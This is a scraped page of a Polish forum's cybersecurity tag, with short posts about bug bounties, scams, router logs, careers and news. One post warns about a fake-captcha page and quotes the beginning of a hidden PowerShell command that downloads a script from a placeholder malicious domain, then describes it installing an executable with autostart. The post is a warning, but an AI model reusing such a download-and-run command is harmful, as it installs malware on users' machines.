#cybersecurity - strona 6

Wszystko

Najnowsze

Archiwum

30.12.2024, 08:56:38

W świecie, gdzie wielkie firmy technologiczne jak Google czy Apple płacą fortuny za odkrywanie luk w swoich systemach, w Polsce mamy... inne standardy. Przykład pierwszy z brzegu: konflikt Dragon Sector, elity polskich hakerów, z Newagiem. Kiedy Dragon Sector wskazał na krytyczne luki w oprogramowaniu używanym przez firmę, reakcja Newagu była, cóż... "oryginalna". Zamiast współpracy czy wdzięczności, przyszły pozwy i oskarżenia o naruszenie praw autorskich.

A teraz perełka. Łukasz Firek, specjalista ds. bezpieczeństwa, postanowił

SatanWasaBabyboomer - W świecie, gdzie wielkie firmy technologiczne jak Google czy Ap...

konto_dla_trybu_nocnego

30.12.2024, 10:50:56 via Wykop

Kiedy Dragon Sector wskazał na krytyczne luki w oprogramowaniu używanym przez firmę, reakcja Newagu była, cóż... "oryginalna"

@Satan_Was_a_Babyboomer: przeciez to nie luki tylko celowe działanie xd

AusserKontrolle

30.12.2024, 13:39:06 via Wykop

@Satan_Was_a_Babyboomer: Polskie firmy mają w------e na bezpieczeństwo. Ja znalazłem IDOR i dostałem odpowiedź "wiemy o tym błędzie" XD Zero bug bounty, czegokolwiek. Nic.

Hiszpania proponuje rewolucyjne ograniczenia dla dzieci w internecie.

Hiszpańskie Ministerstwo ds. Młodzieży przedstawiło przełomowy raport z propozycjami ochrony dzieci w sieci. Proponują zakaz smartfonów do 12 roku życia i ścisła kontrola dostępu do internetu.

z dodany: 20.12.2024, 12:21:45

Parlamentarzyści oszukani metodą na policjanta

W powiązanych drugi przypadek.

z dodany: 19.12.2024, 16:22:10

Rząd europejskiego kraju apeluje: zacznijcie gromadzić gotówkę

Podczas gdy w Polsce tylko 30 procent transakcji odbywa się za pomocą gotówki, holenderskie władze i banki apelują do sw

z dodany: 19.12.2024, 08:49:45

ScamBook - prezentacja o scamach na facebooku z konferencji OhMyHack 2024

Prelegenci pokazują przykłady oszustw na facebooku, m.in. skradzione auta, zgubione bagaże, podszywianie się pod inne osoby, rozpowszechnianie fałszywych informacji. Tłumaczą jak działają oszuści oraz że facebook w sumie nie za wiele z tym coś robi.

z dodany: 15.12.2024, 16:43:54

Pomysły na prezenty związane z cyberbezpieczeństwem cz.1

Gdyby ktoś się zastanawiał nad tym co pożytecznego kupić bliskim to znalazłem taką listę.

z dodany: 11.12.2024, 18:27:07

Krakowskie MPK zostało shackowane tydzień temu - możliwy wyciek danych

W dniu 3 grudnia 2024 r. około godziny 7:00 użytkownicy systemu komputerowego MPK utracili dostęp do serwerów Spółki. Utrata obejmowała w szczególności: brak dostępu do zasobów sieciowych (dyski, oprogramowanie) i do poczty firmowej. Poinformowano również firmy, z którymi MPK posiada zawarte umowy

z dodany: 10.12.2024, 04:14:45

FilipWWL

08.12.2024, 22:24:00

Zdaje mi się, że mam zbyt ciekawego sąsiada (lub sąsiadkę, ale chyba nie).
Mam router "kablowy" z firmy która dostarcza również tv kablówkę. Router jest całkiem spoko, ale oczywiście niektóre ustawienia ma zablokowane i nie tu jest problem. Majstrowałem w logach i zaniepokoiło mnie kilka wpisów. Do tego albo logi są bardzo ograniczone albo może ktoś je wykasował, ogólnie nie jest dobrze.
Zmieniłem chasło do wifi na trudniejsze i logi jak sądzę

Rasteris

08.12.2024, 22:34:48 via Wykop

@FilipWWL: tak

adk

09.12.2024, 06:35:22 via iOS

@FilipWWL ukrywanie ssid wiele nie daje jeżeli ktoś się zna. Ustaw dobre hasło (nie chasło ( ͡° ͜ʖ ͡°) ) i gotowe. A co do logów, to w większości takich routerów nie przetrwają restartu zasilania. Jak odlaczales po drodze to po ptakach.

curro

08.12.2024, 22:16:44

Szukam osoby z branży #cyberbezpieczenstwo która byłaby chętna poświęcić klika minut by odpowiedzieć na parę pytań związanych z pracą:)
#cybersecurity

BreathDeath

09.12.2024, 07:13:54 via Wykop

@curro: NIe kumam ludzi, którzy pytają czy mogą zapytać. Nie możesz po prostu napisać pytań? To może ktoś Ci odpowie.

x_xRazorx_x

04.12.2024, 13:24:09

Ale znalazłem szura na pepperze. Gościu głosi prawdy życiowe, że każde jednorazowe wejście w link może zainfekować kompa ( ͡º ͜ʖ͡º)
jakby ktoś chciał poczytać:
https://www.pepper.pl/promocje/darmowe-przejazdy-komunikacja-miejska-transport-gzm-7-9-grudnia-945832#comment-21317934

cały jego profil jest takimi komentarzami zasrany, odklejeniec.

#cyberbezpieczenstwo #cybersecurity #programowanie #programista15k #informatyka

mielonkazdzika

04.12.2024, 13:26:59 via Wykop

@x_xRazorx_x: nie zemna takie numery. Nie klikam w linki ktore prowadza do tresci o nieklikaniu w linki.

adk

04.12.2024, 16:01:20 via iOS

@mateusz-bogacki w czasach internet explorera 5 czy tam 6 faktycznie lubiło się coś samo zainstalować. Potem nawet w IE w miarę dziury połatali.

SendMeAnAngel

30.11.2024, 12:04:44

Robimy jakiś wypokowy ranking?

https://tryhackme.com/r/christmas
https://adventofcode.com

Może znacie więcej adwentowych rywalizacji?

n0c0Mpr3h3nD

30.11.2024, 12:49:48 via Wykop

@SendMeAnAngel: szkoda czasu wstawać rano i próbować. Lepiej po prostu wbijaj na tag #adventofcode i opowiadaj jak idzie

pionas1337

30.11.2024, 17:13:09 via Wykop

Treść przeznaczona dla osób powyżej 18 roku życia...

Stanowisko CERT Polska dot. ograniczania przez firmę Meta widoczności artykułu

Patologia Facebooka - kasuje wartościowe wpisy CERT Polska, a fałszywe reklamy są nietykalne

z dodany: 29.11.2024, 19:10:25

JamesJoyce

13.11.2024, 07:31:24

#naukaprogramowania #cybersecurity #it t# it #pracait

Tym razem dla juniorów. Jakby ktoś był zainteresowany stanowiskiem juniorskim w cybersec proszę o kontakt.

Nie ma w wymaganiach expa komercyjnego.

Milego

katopa

13.11.2024, 07:46:06 via Wykop

@JamesJoyce: przeciez zaden szanujacy sie programista nie aplikuje na oferte bez widelek, w koncu on prace znajdzie zawsze i nie ma czasu na takie podchody ( ͡° ͜ʖ ͡°)

peoplearestrange

13.11.2024, 12:26:49 via Wykop

@JamesJoyce: security operations center. Wysylasz phishing do anetek i jak klikno forwardujesz szkolenie

BedeKsiedzemJakMojTata

03.11.2024, 09:09:01

Gdybym wierzył mojemu poprzedniemu menadżerowi i "najlepszemu" koledze (który okazał się wampirem energetycznym) do tej pory klepał bym te same nudne taski typu zablokuj url na EDR, moja kreatywność byłaby stłamszona, nie było szans na awans (chyba że z zasiedzenia) ani na lepszą kasę ani szkolenia (typu sans) bo "my [Polacy] do niczego więcej się nie nadajemy". Trzy lata temu walnąłem jednak w stół i teraz w zupełnie innej już firmie (będącej

krampus0101

03.11.2024, 09:18:09 via Wykop

@BedeKsiedzemJakMojTata: brawo. tak się żyje ! czekam na swoją kolej ;)

peoplearestrange

03.11.2024, 09:29:40 via Wykop

@BedeKsiedzemJakMojTata: o, klasyczny przegryw story z małym twistem bo jednak ktos cie tam po drodze docenił, gratki

Wektory ataku oraz ich zapobieganie z wykorzystaniem dostawców bezpieczeństwa

Witam w 262. odcinku podcastu "Porozmawiajmy o IT", w którym rozmawiamy o wektorach ataku i ich zapobieganiu przy wykorz

z dodany: 30.10.2024, 05:58:33

wardx

23.10.2024, 19:25:17

Pytanie do kogoś kto pracuje w #cybersecurity #cybersec

Czy pracodawcy zwracają uwagę na certyfikaty #ccna i #ccnp , czy te certyfikaty są raczej bezwartościowe w tej branży? Ewentualnie na co lepiej zwrócić uwagę?

Interpretator

23.10.2024, 19:36:41 via Wykop

@wardx: Kiedyś może i były aktualnie to i tak na rozmowie możesz wykazać się znajomością sieci. Raczej bym uderzał w CompTIA.

AusserKontrolle

24.10.2024, 17:48:50 via Wykop

@wardx: A jako kto szukasz pracy? To dość istotne.

w.....7

konto usunięte 18.10.2024, 06:41:33

Najbardziej szyderczy scam? Właśnie go dostałem.

Nagłówek to tłumacząc na Polski "Test IQ w 3 minuty".
E-mail, który jest podany jako adresat niw jest mój.
( ͡º ͜ʖ͡º)

#scam #cyberbezpieczenstwo #cybersecurity #heheszki

w.....7 - Najbardziej szyderczy scam? Właśnie go dostałem.

Nagłówek to tłumacząc na ... — **źródło:** temp_file1263527978254654393
Pobierz

BobertHaubica

08.10.2024, 15:43:30

#facebook #meta #cyberbezpieczenstwo #cybersecurity
Orientuje się ktoś czy były jakieś zmiany w 2FA FB/Mety? Dzisiaj z ciekawości coś zacząłem sobie sprawdzać w ustawieniach mojego konta i dowiedziałem się, że 2FA mam wyłączone, co jest bez sensu bo Google Authenticator cały czas mi generuje kody xD

xavhowk

06.10.2024, 11:28:45

Takie coś mi wyskoczyło na jednej stronie, przy wyłączonym adblocku.
W schowku była komenda do wykonania w powershellu. To był jakiś prosty skrypt, który ściągał plik tekstowy i uruchamiał go jako kolejny skrypt. Drugi skrypt z pliku tekstowego ściągał plik zip, rozpakowywał, uruchamiał exe z katalogu. Exe rozgaszczał się jak sądzę w AppData a do rejestru dodawany był wpis potrzebny do autostartu.

Pierwszy skrypt

powershell.exe -W Hidden -command $url = 'adreszlosliwejstronyinternetowej.com/n2.txt'; $response

xavhowk - Takie coś mi wyskoczyło na jednej stronie, przy wyłączonym adblocku.
W scho... — **źródło:** Screenshot 2024-10-06 at 13-06-33 Verify You Are Human
Pobierz

adk

06.10.2024, 11:52:18 via Wykop

@xavhowk: Self-RCE ( ͡° ͜ʖ ͡°)
Tu podobna historia: https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/

fabek

05.12.2024, 00:17:53 via Wykop

@xavhowk: hej. tą technikę fake captcha wykorzystuje obecnie LummaC2 stealer.

Gigantyczna wiedza dla adminów. Przyda się każdemu, nic nie kosztuje

Admin Days to wydarzenie, które na stałe wpisało się w kalendarz najważniejszych imprez dla branży IT. Event rozpocznie się 15 października i potrwa do 24 października. Udział w wydarzeniu jest darmowy.

z dodany: 04.10.2024, 11:53:04